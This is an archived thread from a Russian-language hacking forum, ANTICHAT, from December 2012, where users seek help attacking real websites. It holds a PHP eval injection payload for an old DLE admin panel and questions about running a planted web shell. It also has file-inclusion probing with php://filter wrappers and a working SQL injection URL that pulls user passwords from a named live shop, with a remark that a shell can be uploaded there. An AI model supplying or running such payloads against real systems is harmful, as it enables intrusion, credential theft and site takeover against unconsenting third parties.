ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
09.12.2012, 14:39
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от zloy_fantom
zloy_fantom said:
Прошу прощения, что задаю дурацкие вопросы, но сам пода не могу дотумкать:
разместил-таки шелл на сайте, подключившись через openVPN по адресу:
//ххх.ххх.ххх.ххх/shell.php
Но при попытке его запустить получаю следующее:
file://ххх.ххх.ххх.ххх/shell.php
Как следствие, получаю его код, если-же вписать в адресную стоку http://ххх.ххх.ххх.ххх/shell.php то происходит редирект:
http://site/shell.php и выводится: "No input file specified."
Как-же его все-таки запустить? Спасибо
Да, может это важно, если отключиться от openVPN, то указанный ip не доступен
Рядом с шеллом был .htaccess ??
|
|
|
09.12.2012, 15:06
|
|
Guest
Сообщений: n/a
Провел на форуме:
15180
Репутация:
0
|
|
Сообщение от BigBear
BigBear said:
Рядом с шеллом был .htaccess ??
вообще-то путь к шеллу http://ххх.ххх.ххх.ххх/shell.php на самом деле длинный, я его просто сократил, возможно .htaccess должен быть не в папке с шеллом, а в корневой...
Что-то я совсем запутался....
Выходит, .htaccess как раз и нужен для редиректа, на ххх.ххх.ххх.ххх/ я его не нашел
|
|
|
|
10.12.2012, 04:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Nightmarе
Nightmarе said:
Помогите найти один сплойт под админку DLE.
Раньше был замечательный публичный сплойт позволявший путём отправки специального POST запроса скрипту с админской сессией в дальнейшем выполнять php код на всем сайте, недавно он мне сильно понадобился, я начал его искать, но найти так и не смог, то ли его из паблика убрали, то ли я плохо искал, я только нашёл недоработанный кусок этого сплойта:
/showpost.php?p=2353405&postcount=167
Если у кого имеется полный рабочий вариант, пожалуйста поделитесь.
Это сплоит для старой версии, и там достаточно заюзать конструкцию по типу ';eval($_GET[e]);//
и сохранить конфиг
|
|
|
|
10.12.2012, 15:44
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696
Репутация:
1
|
|
инклуд или просто читалка?
хелп ми,гайс...
Url: http://site.com/index.php?thumbnail={code}
или
http://site.com/index.php?download={code}
кусок кода для этих 2 параметров:
Код:
Code:
if ($_GET["thumbnail"]!="") {
GLOBAL $thumbnailHeight, $cacheThumbnails;
$thumbnailCacheSubdir = ".snifthumbs";
$file = safeDirectory(urldecode($_GET["thumbnail"]));
doConditionalGet($_GET["thumbnail"],filemtime($file));
$thumbDir = dirname($file)."/".$thumbnailCacheSubdir;
$thumbFile = $thumbDir."/".basename($file);
if ($cacheThumbnails) {
if (file_exists($thumbDir)) {
if (!is_dir($thumbDir)) {
$cacheThumbnails = false;
}
} else {
if (@mkdir($thumbDir)) {
chmod($thumbDir, "0777");
} else {
$cacheThumbnails = false;
}
}
if (file_exists($thumbFile)) {
if (filemtime($thumbFile)>=filemtime($file)) {
Header("Location: ".dirname($_SERVER["PHP_SELF"])."/".$thumbFile);
die();
}
}
}
$contentType = "";
$extension = strtolower(substr(strrchr($file, "."), 1));
switch ($extension) {
case "gif": $src = imagecreatefromgif($file); $contentType="image/gif"; break;
case "jpg": // fall through
case "jpeg": $src = imagecreatefromjpeg($file); $contentType="image/jpeg"; break;
case "png": $src = imagecreatefrompng($file); $contentType="image/png"; break;
default: die(); break;
}
$srcWidth = imagesx($src);
$srcHeight = imagesy($src);
$srcAspectRatio = $srcWidth / $srcHeight;
$maxAge = 3600; // one hour
Header("Cache-Control: public, max-age=$maxAge, must-revalidate");
Header("Expires: ".createHTTPDate(time()+$maxAge));
if ($srcHeight $srcHeight) {
$thumbWidth = $thumbnailWidth;
$thumbHeight = $thumbWidth / $srcAspectRatio;
} else {
$thumbHeight = $thumbnailHeight;
$thumbWidth = $thumbHeight * $srcAspectRatio;
}
if (function_exists('imagecreatetruecolor')) {
$thumb = imagecreatetruecolor($thumbWidth, $thumbHeight);
} else {
$thumb = imagecreate($thumbWidth, $thumbHeight);
}
imagecopyresampled($thumb, $src, 0, 0, 0, 0, $thumbWidth, $thumbHeight, $srcWidth, $srcHeight);
Header("Content-Type: image/jpeg");
if ($cacheThumbnails) {
imagejpeg($thumb, $thumbFile);
chmod($thumbFile, "0777");
readfile($thumbFile);
} else {
imagejpeg($thumb);
}
}
die();
}
if ($_GET["download"]!="") {
$download = stripslashes($_GET["download"]);
$filename = safeDirectory($path.rawurldecode($download));
if (
!file_exists($filename)
OR fileIsHidden($filename)
OR (substr(strtolower($filename), -4)==".php" AND !$allowPHPDownloads)) {
Header("HTTP/1.0 404 Not Found");
$displayError[] = sprintf(translate("File not found: %s"), $filename);
} else {
//doConditionalGet($filename, filemtime($filename));
Header("Content-Length: ".filesize($filename));
Header("Content-Type: application/x-download");
Header("Content-Disposition: attachment; filename=\"".rawurlencode($download)."\"");
readfile($filename);
die();
}
}
allow_url_fopen = On
allow_url_include = Off
file:/// - работает
php://filter/convert.base64-encode/resource - работает
php://input или data: - не получилось
логи читает,однако php-код не выполняет(код виден только в исходнике страницы)
возможен ли тут RFI или LFI?
|
|
|
|
10.12.2012, 16:13
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от HeaVeNSeR
HeaVeNSeR said:
хелп ми,гайс...
Url: http://site.com/index.php?thumbnail={code}
или
http://site.com/index.php?download={code}
кусок кода для этих 2 параметров
Код:
Code:
if ($_GET["thumbnail"]!="") {
...
...
...
if ($cacheThumbnails) {
imagejpeg($thumb, $thumbFile);
chmod($thumbFile, "0777");
readfile($thumbFile);
} else {
imagejpeg($thumb);
}
}
die();
}
if ($_GET["download"]!="") {
...
...
...
readfile($filename);
die();
}
}
Читалки файлов. Большего из них не выжмешь.
|
|
|
|
10.12.2012, 16:45
|
|
Новичок
Регистрация: 03.12.2008
Сообщений: 5
Провел на форуме:
597696
Репутация:
1
|
|
BigBear,спс...
в этой теме с readfile якобы можно получить веб-шелл...у меня так и не вышло...
З.Ы. полный соурс этого файла в паблике есть оказывается)
[URL="http://www.bitfolge.de/download/source/snif.phps"]=>Линк
|
|
|
|
10.12.2012, 17:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
15180
Репутация:
0
|
|
Сообщение от zloy_fantom
zloy_fantom said:
Прошу прощения, что задаю дурацкие вопросы, но сам пода не могу дотумкать:
разместил-таки шелл на сайте, подключившись через openVPN по адресу:
//ххх.ххх.ххх.ххх/shell.php
Но при попытке его запустить получаю следующее:
file://ххх.ххх.ххх.ххх/shell.php
Как следствие, получаю его код, если-же вписать в адресную стоку http://ххх.ххх.ххх.ххх/shell.php то происходит редирект:
http://site/shell.php и выводится: "No input file specified."
Как-же его все-таки запустить? Спасибо
Да, может это важно, если отключиться от openVPN, то указанный ip не доступен
Тут я поторопился с выводом: на \\ххх.ххх.ххх.ххх\ развернут именно OpenVPN, собственно и положил я шелл на него просто через виртуальную сеть, получился путь "Сеть\\ххх.ххх.ххх.ххх\share\insta ll\winrar\keygen\shell.php", видимо, поэтому браузер и подхватывает его через протокол "file://", если обратиться напрямую к адресу http://ххх.ххх.ххх.ххх/ (или любому подкаталогу), происходит редирект на целевой сайт http://site/, как я и писал, при этом ip целевого сайта другой. При этом я точно знаю, что админ у виртуальной сети и целевого сайта один и тот-же, но не могу быть уверенным, что они подняты на одной машине. Как можно это выяснить?
Может, в такой ситуации, я вообще не смогу запустить шелл?
Спасибо
|
|
|
|
12.12.2012, 20:59
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от grimnir
grimnir said:
Помогите пожалуйста составить верный запрос,чтобы вытянуть пароли. Уже час сижу, голова не варит h**p://store.vampirefreaks.com/?cat_id=-11'+union+all+select+1,2,(select+concat(0x27,0x7e, Users.user_password,0x27,0x7e)+from+`synthtec`.Use rs+Order+by+user_password+limit+5,1),4,5+and+1='2
Изучай вниматильней мануалы
Сообщение от None
ht_p://store.vampirefreaks.com/?cat_id=-11%27+union+all+select+1,2,user_password,4,5+from+ synthtec.Users+limit+0,1+--+
P.S: у вас там файловые привилегии, раскрытие путей, есть папки для запеси, шелл отлично льется!
|
|
|
|
13.12.2012, 09:37
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от grimnir
grimnir said:
Да,подтяну скиллы свои ,благодарю за совет. Интересует вот что только -почему у них там пароли вопросами? или это у меня только так?
Проблемы с кодировкой скорее всего.
|
|
|
|
13.12.2012, 13:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
15180
Репутация:
0
|
|
Кто-нибудь знает, чем можно открыть файлы .MYD.MYI.frm в удобном оконном интерфейсе? Как-то неохота через командную строку работать (не зная команд mysql)
Спасибо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
